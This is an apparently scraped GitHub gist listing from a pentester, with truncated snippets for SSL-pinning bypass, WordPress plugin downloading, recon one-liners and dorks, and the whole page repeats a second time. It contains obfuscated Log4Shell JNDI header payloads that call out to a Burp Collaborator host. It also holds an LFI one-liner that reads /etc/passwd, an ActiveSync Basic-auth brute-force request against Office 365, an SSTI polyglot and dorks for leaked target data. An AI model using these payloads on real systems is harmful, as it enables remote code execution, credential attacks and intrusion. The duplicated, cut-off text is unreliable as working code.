(inc0gbyt3) incogbyte

## burpsuitePassThrough.txt
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog

## options_brute_microsoft.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                incogbyte
                / options_brute_microsoft.md
            
            
              Last active
              December 20, 2022 12:21
            
              
                options_brute_microsoft
              
          
    OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass

  
## mixunpin.js
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

## wordpress_downloader.py
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile

def wordpress_plugin():
    urls = []

## oneliners.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              4 stars
            
          
                incogbyte
                / oneliners.md
            
            
              Last active
              October 31, 2023 04:03
            
              
                One liners recon
              
          
FFUF fuzzing paths + Domains

assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'


LFI testing

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'


## dorks.txt
"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com |  site:jsfiddle.net | site:trello.com | site:.attlasian.net "target" "

## polyglotFinder.txt
${{<%[%'"}}%\.vult00

## fonts.sh
#!/bin/bash

sudo apt install fontconfig
cd ~
wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
mkdir -p .local/share/fonts
unzip Meslo.zip -d .local/share/fonts
cd .local/share/fonts
rm *Windows*
cd ~

## base64PassGen.py
import os
import sys
import base64

'''

Small script to generate base64 passwords like, YWRtaW46YWRtaW4=


usage

## log4j.txt
        User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}

        User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	Burp Suite > Proxy > Options > TLS Pass Through.
	Add these:
	*.google\.com
	.*.gstatic).com
	*.mozilla\.com
	.*\.googleapis\.com
	*.pkil.goog
	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
	from shutil import ExecError
	import requests
	from bs4 import BeautifulSoup
	import os
	import wget
	from concurrent.futures import ThreadPoolExecutor
	import zipfile

	def wordpress_plugin():
	urls = []
	#!/bin/bash

	sudo apt install fontconfig
	cd ~
	wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
	mkdir -p .local/share/fonts
	unzip Meslo.zip -d .local/share/fonts
	cd .local/share/fonts
	rm Windows
	cd ~
	import os
	import sys
	import base64

	'''

	Small script to generate base64 passwords like, YWRtaW46YWRtaW4=


	usage
	User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
	Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}

	User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
	X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}